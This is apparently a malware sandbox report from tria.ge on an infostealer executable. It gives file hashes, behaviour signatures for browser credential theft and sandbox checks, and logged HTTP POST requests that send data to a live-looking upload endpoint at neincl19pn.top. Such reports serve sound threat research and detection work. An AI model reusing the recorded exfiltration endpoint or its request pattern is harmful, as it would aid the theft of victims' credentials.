Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
19/08/2024, 13:34 UTC
Static task
static1
Behavioral task
behavioral1
Sample
624b8a65cbeeb9a10635a297970cacb4a2c43a1c50d92900b71bc5249adec01e.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
624b8a65cbeeb9a10635a297970cacb4a2c43a1c50d92900b71bc5249adec01e.exe
Resource
win10v2004-20240802-en
General
-
Target
624b8a65cbeeb9a10635a297970cacb4a2c43a1c50d92900b71bc5249adec01e.exe
-
Size
6.4MB
-
MD5
8947f3e99f8e87418cfa12b68df1d517
-
SHA1
24eb725c90c62edad45439321392aa8a13aef65f
-
SHA256
624b8a65cbeeb9a10635a297970cacb4a2c43a1c50d92900b71bc5249adec01e
-
SHA512
8c8c907f8444eaaf6aa6242d3228115f8456ff825af84ecb5a215a233f1df2dfab11ce8c879f8e528038a0e317f37783d94dc23db9254015fc829602fddad082
-
SSDEEP
98304:29TuOQrltBAFyj6z5vlcDJ5oYOkm/SsptqSpzzOKNt:29aTrlTEyOplc9DOtvtX9nNt
Malware Config
Signatures
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 624b8a65cbeeb9a10635a297970cacb4a2c43a1c50d92900b71bc5249adec01e.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 624b8a65cbeeb9a10635a297970cacb4a2c43a1c50d92900b71bc5249adec01e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 624b8a65cbeeb9a10635a297970cacb4a2c43a1c50d92900b71bc5249adec01e.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\624b8a65cbeeb9a10635a297970cacb4a2c43a1c50d92900b71bc5249adec01e.exe"C:\Users\Admin\AppData\Local\Temp\624b8a65cbeeb9a10635a297970cacb4a2c43a1c50d92900b71bc5249adec01e.exe"1⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:1740
Network
-
Remote address:8.8.8.8:53Requestneincl19pn.topIN AResponseneincl19pn.topIN A172.67.168.197neincl19pn.topIN A104.21.54.175
-
POSThttp://neincl19pn.top/v1/upload.php624b8a65cbeeb9a10635a297970cacb4a2c43a1c50d92900b71bc5249adec01e.exeRemote address:172.67.168.197:80RequestPOST /v1/upload.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data; boundary=----Boundary85523871
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Length: 413
Host: neincl19pn.top
ResponseHTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: keep-alive
ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uR7s6JY9DsE3uqi2ErPV%2B4t7dnmPB0kLHBPVXkzvOyZyMsvxI6RI%2FkrgCfhaQChQv%2F8N72XoHFlxEM%2FdU6XvBGz8LQp51E1jvKsm5j%2F8CCmHXPemOS2SFd6kg1T7YL33vw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8b5a861fee06459b-LHR
alt-svc: h3=":443"; ma=86400
-
POSThttp://neincl19pn.top/v1/upload.php624b8a65cbeeb9a10635a297970cacb4a2c43a1c50d92900b71bc5249adec01e.exeRemote address:172.67.168.197:80RequestPOST /v1/upload.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data; boundary=----Boundary72859479
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Length: 58855
Host: neincl19pn.top
-
POSThttp://neincl19pn.top/v1/upload.php624b8a65cbeeb9a10635a297970cacb4a2c43a1c50d92900b71bc5249adec01e.exeRemote address:172.67.168.197:80RequestPOST /v1/upload.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data; boundary=----Boundary72859479
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Length: 58855
Host: neincl19pn.top
ResponseHTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: keep-alive
ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UTZjTdNOb%2Fcm5uLB8hp0bXRP5AzHrMrvGxSMr9LbXfIqYHdRIxk0K1XKOlYoaXYHJGl0Opy0NqlyB1hDbaNteb1UXuaa3tF4vqu0LPiQmhCEs7mI7ODnFz8beYhGVeSWYA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8b5a86a9b9ac48c4-LHR
alt-svc: h3=":443"; ma=86400
-
POSThttp://neincl19pn.top/v1/upload.php624b8a65cbeeb9a10635a297970cacb4a2c43a1c50d92900b71bc5249adec01e.exeRemote address:172.67.168.197:80RequestPOST /v1/upload.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data; boundary=----Boundary14160866
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Length: 30517
Host: neincl19pn.top
ResponseHTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: keep-alive
ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G%2FKg70RAcgxDwiSJ7WulCBrVGELWR1uG7tsrGHh9SlAHUnHusn7f6OnUyDLJ3bYewJcQ%2FR3wxz8%2FG%2B4RTJB0rV6tU3hdYBD2SC%2F%2Bp5V4%2F9s6h%2FByPUp7iJjgUk8xYFC56A%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8b5a86f4ecce48c4-LHR
alt-svc: h3=":443"; ma=86400
-
172.67.168.197:80http://neincl19pn.top/v1/upload.phphttp624b8a65cbeeb9a10635a297970cacb4a2c43a1c50d92900b71bc5249adec01e.exe34.4kB 1.2kB 32 13
HTTP Request
POST http://neincl19pn.top/v1/upload.phpHTTP Response
200HTTP Request
POST http://neincl19pn.top/v1/upload.php -
172.67.168.197:80http://neincl19pn.top/v1/upload.phphttp624b8a65cbeeb9a10635a297970cacb4a2c43a1c50d92900b71bc5249adec01e.exe148.2kB 5.0kB 116 58
HTTP Request
POST http://neincl19pn.top/v1/upload.phpHTTP Response
200HTTP Request
POST http://neincl19pn.top/v1/upload.phpHTTP Response
200